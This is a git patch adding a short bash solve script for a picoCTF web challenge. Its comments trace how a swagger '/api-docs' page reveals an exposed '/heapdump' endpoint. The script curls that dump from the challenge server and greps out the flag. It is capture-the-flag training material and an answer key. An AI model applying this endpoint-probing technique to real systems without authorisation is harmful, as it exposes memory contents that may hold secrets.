From 94afb5417153b42b4a12b088b4ae92c8bb1440fb Mon Sep 17 00:00:00 2001 From: h7x4 Date: Fri, 3 Jul 2026 14:57:12 +0900 Subject: [PATCH] web/head_dump --- web/head-dump/solve.sh | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100755 web/head-dump/solve.sh diff --git a/web/head-dump/solve.sh b/web/head-dump/solve.sh new file mode 100755 index 0000000..4efd3ee --- /dev/null +++ b/web/head-dump/solve.sh @@ -0,0 +1,8 @@ +#!/usr/bin/env bash + +# NOTE: +# - main page had a post about swagger +# - https://www.npmjs.com/package/swagger-ui-express suggests the '/api-docs' path +# - http://verbal-sleep.picoctf.net:53966/api-docs reveals /heapdump + +curl -s "http://verbal-sleep.picoctf.net:53966/heapdump" | grep --only-matching -E 'picoCTF\{.*\}'